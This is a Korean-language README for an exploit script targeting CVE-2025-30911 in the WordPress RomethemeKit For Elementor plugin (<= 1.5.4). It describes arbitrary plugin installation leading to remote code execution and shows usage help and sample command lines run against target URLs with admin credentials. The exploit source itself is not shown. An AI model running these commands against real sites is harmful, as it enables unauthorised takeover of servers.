
WordPress RomethemeKit For Elementor 플러그인 <= 1.5.4는 원격 코드 실행(RCE)에 취약합니다.
이 스크립트는 **RomethemeKit For Elementor WordPress 플러그인(<= v1.5.4)**의 치명적인 취약점을 악용하여 인증된 사용자의 임의 플러그인 설치 및 활성화를 허용하며, 잠재적으로 **원격 코드 실행(RCE)**로 이어질 수 있습니다.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H이 취약점은 인증된 공격자(관리자 권한 보유)가 모든 플러그인(악성 플러그인 포함 가능)을 프로그래밍 방식으로 설치하고 활성화할 수 있게 하며, 이로 인해 서버에서 완전한 코드 실행이 발생할 수 있습니다.
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit For CVE-2025-30911 | By Nxploited Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Base URL of the WordPress site
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
-pl, --plugin PLUGIN Plugin to install (default: hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests 라이브러리(pip install requests로 설치)이 도구는 교육 및 공인된 보안 테스트 용도로만 제공됩니다. 무단 사용은 불법이며 비윤리적입니다.
작성자: Nxploited | Khaled Alenazi